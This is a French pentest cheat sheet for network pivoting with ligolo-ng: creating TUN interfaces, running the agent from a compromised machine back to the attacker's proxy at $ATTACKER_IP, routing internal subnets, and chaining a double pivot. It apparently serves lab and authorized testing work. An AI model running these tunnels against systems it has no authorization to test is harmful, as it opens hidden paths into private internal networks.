Pivoting
Tunnel TUN kernel-space, routing de subnets internes et double pivot.
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo upCrée et active l'interface TUN ligolo sur l'attaquant. À faire une seule fois par session.
sudo ip link delete ligoloSupprime l'interface en fin de mission (nettoyage).
./proxy -selfcertLance le proxy sur 0.0.0.0:11601 avec un certificat autosigné (adapté au lab).
./agent --connect $ATTACKER_IP:11601 --ignore-cert --retryConnecte l'agent depuis la machine compromise vers le proxy. --retry maintient la connexion.
ligolo-ng » sessionListe les sessions actives en attente de sélection.
ligolo-ng » 1Sélectionne la session numéro 1.
ligolo-ng » ifconfigAffiche les interfaces réseau de la machine compromise, utile pour cartographier les subnets internes.
ligolo-ng » startLance le tunnel sur l'interface ligolo. Le trafic routé vers ligolo passe par la cible.
sudo ip route add $SUBNET dev ligoloRoute un subnet interne via l'interface ligolo pour l'atteindre depuis l'attaquant.
ip route listVérifie les routes actives pour confirmer que le subnet est bien accessible.
sudo ip route del $SUBNET dev ligoloRetire une route quand elle n'est plus nécessaire.
sudo ip tuntap add user root mode tun ligolo2
sudo ip link set ligolo2 upCrée une seconde interface TUN pour pivoter depuis une deuxième machine compromise.
ligolo-ng » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcpOuvre un listener sur l'agent (machine 1) qui redirige vers le proxy. Permet à l'agent 2 de s'y connecter.
ligolo-ng » tunnel_start --tun ligolo2Lance le tunnel sur l'interface ligolo2 pour la session du second agent.
sudo ip route add $SUBNET2 dev ligolo2Route le subnet du troisième segment via ligolo2.